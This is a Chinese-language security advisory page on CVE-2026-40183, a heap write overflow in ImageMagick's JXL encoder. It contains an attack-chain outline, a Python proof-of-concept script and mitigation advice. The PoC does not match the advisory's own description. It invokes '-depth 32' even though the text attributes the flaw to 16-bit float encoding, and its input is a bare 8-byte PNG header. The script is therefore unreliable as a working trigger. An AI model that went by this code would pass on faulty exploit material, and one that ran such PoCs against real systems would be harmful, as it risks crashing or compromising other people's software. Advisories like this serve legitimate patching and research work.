CVE-2026-40183 CVSS 5.5 中危

CVE-2026-40183 ImageMagick堆写入溢出漏洞

披露日期: 2026-04-13

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-40183

漏洞类型

堆写入溢出

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

ImageMagick

漏洞概述

ImageMagick是一款广泛使用的图像处理软件。在7.1.2-19之前的版本中，其JXL编码器存在堆写入溢出漏洞。当用户指定将图像编码为16位浮点数时，由于边界检查缺失，触发越界写入。攻击者可诱导用户处理特制文件，导致应用程序崩溃或内存破坏，建议尽快升级修复。

技术细节

该漏洞位于ImageMagick的JXL（JPEG XL）编码模块中。在7.1.2-19之前的版本中，当程序尝试将图像数据编码为16位浮点格式时，编码器未能正确计算所需缓冲区大小，导致在堆内存区域发生越界写入（Heap Write Overflow）。攻击者可以利用这一逻辑缺陷，通过构造特殊的图像文件或恶意命令行参数，诱导受害者进行图像转换操作。虽然该漏洞被标记为本地攻击向量（AV:L）且需要用户交互（UI:R），但成功利用极易导致应用程序崩溃（DoS），在特定内存布局下甚至可能进一步升级为任意代码执行，严重影响系统的可用性和安全性。

攻击链分析

STEP 1

1. 武器化

攻击者准备一个特制的图像文件，或者确定能够触发ImageMagick进行JXL 16位浮点编码的命令参数。

STEP 2

2. 投递

由于需要本地访问和用户交互，攻击者将恶意文件发送给目标用户，或诱导用户下载。

STEP 3

3. 利用

目标用户使用易受攻击版本的ImageMagick打开或转换该文件，并指定了16位浮点编码。

STEP 4

4. 影响

触发堆写入溢出，导致ImageMagick进程崩溃（DoS），或在特定条件下执行任意代码。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC for CVE-2026-40183
# This script demonstrates triggering the heap overflow in ImageMagick
# by forcing the JXL encoder to use 16-bit float encoding.

import subprocess
import os

# Create a dummy input file if not exists
input_file = 'test.png'
if not os.path.exists(input_file):
    with open(input_file, 'wb') as f:
        f.write(b'\x89PNG\r\n\x1a\n') # Minimal PNG header

try:
    # The -depth parameter combined with JXL output triggers the vulnerable code path
    # Versions < 7.1.2-19 are vulnerable to heap write overflow here
    result = subprocess.run(
        ['magick', input_file, '-depth', '32', 'output.jxl'],
        capture_output=True,
        text=True,
        timeout=5
    )
    print("Exit Code:", result.returncode)
    print("Stderr:", result.stderr)
except subprocess.TimeoutExpired:
    print("Process hung/timed out (possible crash)")
except Exception as e:
    print(f"Exception occurred: {e}")

影响范围

ImageMagick < 7.1.2-19

防御指南

临时缓解措施

建议立即将ImageMagick更新到修复了此漏洞的7.1.2-19版本。如果暂时无法更新，应避免使用JXL编码器处理来源不明的图像，或者严格限制调用ImageMagick的进程权限，以防止潜在的内存破坏导致系统级影响。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表